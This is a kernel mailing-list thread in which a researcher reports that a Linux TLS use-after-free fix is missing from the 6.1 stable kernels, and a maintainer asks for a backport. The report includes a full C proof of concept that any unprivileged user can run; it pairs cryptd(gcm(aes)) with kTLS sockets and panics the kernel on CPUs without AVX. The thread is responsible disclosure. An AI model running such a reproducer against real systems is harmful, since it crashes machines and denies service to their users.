netdev.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* [BUG] Missing backport for UAF fix in interaction between tls_decrypt_sg and cryptd_queue_worker
@ 2025-08-11 17:03 William Liu
  2025-08-12  8:51 ` Greg KH
  0 siblings, 1 reply; 2+ messages in thread
From: William Liu @ 2025-08-11 17:03 UTC (permalink / raw)
  To: stable@vger.kernel.org
  Cc: sd@queasysnail.net, Jakub Kicinski, netdev@vger.kernel.org, Savy,
	john.fastabend@gmail.com, borisp@nvidia.com

Hi all,

Commit 41532b785e (tls: separate no-async decryption request handling from async) [1] actually covers a UAF read and write bug in the kernel, and should be backported to 6.1. As of now, it has only been backported to 6.6, back from the time when the patch was committed. The commit mentions a non-reproducible UAF that was previously observed, but we managed to hit the vulnerable case.

The vulnerable case is when a user wraps an existing crypto algorithm (such as gcm or ghash) in cryptd. By default, cryptd-wrapped algorithms have a higher priority than the base variant. tls_decrypt_sg allocates the aead request, and triggers the crypto handling with tls_do_decryption. When the crypto is handled by cryptd, it gets dispatched to a worker that handles it and initially returns EINPROGRESS. While older LTS versions (5.4, 5.10, and 5.15) seem to have an additional crypto_wait_req call in those cases, 6.1 just returns success and frees the aead request. The cryptd worker could still be operating in this case, which causes a UAF. 

However, this vulnerability only occurs when the CPU is without AVX support (perhaps this is why there were reproducibility difficulties). With AVX, aesni_init calls simd_register_aeads_compat to force the crypto subsystem to use the SIMD version and avoids the async issues raised by cryptd. While I doubt many people are using host systems without AVX these days, this environment is pretty common in VMs when QEMU uses KVM without using the "-cpu host" flag.

The following is a repro, and can be triggered from unprivileged users. Multishot KASAN shows multiple UAF reads and writes, and ends up panicking the system with a null dereference.

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/tcp.h>
#include <linux/tls.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <linux/if_alg.h>
#include <signal.h>
#include <sys/wait.h>
#include <time.h>

struct tls_conn {
    int tx;
    int rx;
};

void tls_enable(int sk, int type) {
    struct tls12_crypto_info_aes_gcm_256 tls_ci = {
        .info.version = TLS_1_3_VERSION,
        .info.cipher_type = TLS_CIPHER_AES_GCM_256,
    };

    setsockopt(sk, IPPROTO_TCP, TCP_ULP, "tls", sizeof("tls"));
    setsockopt(sk, SOL_TLS, type, &tls_ci, sizeof(tls_ci));
}

struct tls_conn *tls_create_conn(int port) {
    int s0 = socket(AF_INET, SOCK_STREAM, 0);
    int s1 = socket(AF_INET, SOCK_STREAM, 0);

    struct sockaddr_in a = {
        .sin_family = AF_INET,
        .sin_port = htons(port),
        .sin_addr = htobe32(0),
    };

    bind(s0, (struct sockaddr*)&a, sizeof(a));
    listen(s0, 1);
    connect(s1, (struct sockaddr *)&a, sizeof(a));
    int s2 = accept(s0, 0, 0);
    close(s0);
    
    tls_enable(s1, TLS_TX);
    tls_enable(s2, TLS_RX);

    struct tls_conn *t = calloc(1, sizeof(struct tls_conn));

    t->tx = s1;
    t->rx = s2;

    return t;
}

void tls_destroy_conn(struct tls_conn *t) {
    close(t->tx);
    close(t->rx);
    free(t);
}

int tls_send(struct tls_conn *t, char *data, size_t size) {
    return sendto(t->tx, data, size, 0, NULL, 0);
}

int tls_recv(struct tls_conn *t, char *data, size_t size) {
    return recvfrom(t->rx, data, size, 0, NULL, NULL);
}

int crypto_register_algo(char *type, char *name) {
    
    int s = socket(AF_ALG, SOCK_SEQPACKET, 0);

    struct sockaddr_alg sa = {};

    sa.salg_family = AF_ALG;
    strcpy(sa.salg_type, type);
    strcpy(sa.salg_name, name);

    bind(s, (struct sockaddr *)&sa, sizeof(sa));
    close(s);
    
    return 0;
}

int main(void) {
    char buff[0x2000];
    crypto_register_algo("aead", "cryptd(gcm(aes))");
    struct tls_conn *t = tls_create_conn(20000);
    tls_send(t, buff, 0x10);
    tls_recv(t, buff, 0x100);
}

Feel free to let us know if you have any questions and if there is anything else we can do to help.

Best,
Will
Savy

[1] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=41532b785e9d79636b3815a64ddf6a096647d011

^ permalink raw reply	[flat|nested] 2+ messages in thread

* Re: [BUG] Missing backport for UAF fix in interaction between tls_decrypt_sg and cryptd_queue_worker
  2025-08-11 17:03 [BUG] Missing backport for UAF fix in interaction between tls_decrypt_sg and cryptd_queue_worker William Liu
@ 2025-08-12  8:51 ` Greg KH
  0 siblings, 0 replies; 2+ messages in thread
From: Greg KH @ 2025-08-12  8:51 UTC (permalink / raw)
  To: William Liu
  Cc: stable@vger.kernel.org, sd@queasysnail.net, Jakub Kicinski,
	netdev@vger.kernel.org, Savy, john.fastabend@gmail.com,
	borisp@nvidia.com

On Mon, Aug 11, 2025 at 05:03:47PM +0000, William Liu wrote:
> Hi all,
> 
> Commit 41532b785e (tls: separate no-async decryption request handling from async) [1] actually covers a UAF read and write bug in the kernel, and should be backported to 6.1. As of now, it has only been backported to 6.6, back from the time when the patch was committed. The commit mentions a non-reproducible UAF that was previously observed, but we managed to hit the vulnerable case.
> 
> The vulnerable case is when a user wraps an existing crypto algorithm (such as gcm or ghash) in cryptd. By default, cryptd-wrapped algorithms have a higher priority than the base variant. tls_decrypt_sg allocates the aead request, and triggers the crypto handling with tls_do_decryption. When the crypto is handled by cryptd, it gets dispatched to a worker that handles it and initially returns EINPROGRESS. While older LTS versions (5.4, 5.10, and 5.15) seem to have an additional crypto_wait_req call in those cases, 6.1 just returns success and frees the aead request. The cryptd worker could still be operating in this case, which causes a UAF. 
> 
> However, this vulnerability only occurs when the CPU is without AVX support (perhaps this is why there were reproducibility difficulties). With AVX, aesni_init calls simd_register_aeads_compat to force the crypto subsystem to use the SIMD version and avoids the async issues raised by cryptd. While I doubt many people are using host systems without AVX these days, this environment is pretty common in VMs when QEMU uses KVM without using the "-cpu host" flag.
> 
> The following is a repro, and can be triggered from unprivileged users. Multishot KASAN shows multiple UAF reads and writes, and ends up panicking the system with a null dereference.

As you can test this, please provide a working backport of that commit
to the 6.1.y tree if you wish to see it applied to that kernel version
as it does not apply cleanly as-is.

Same for older kernel versions if you think it should be applied there
as well.

thanks,

greg k-h

^ permalink raw reply	[flat|nested] 2+ messages in thread

end of thread, other threads:[~2025-08-12  8:51 UTC | newest]

Thread overview: 2+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2025-08-11 17:03 [BUG] Missing backport for UAF fix in interaction between tls_decrypt_sg and cryptd_queue_worker William Liu
2025-08-12  8:51 ` Greg KH

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).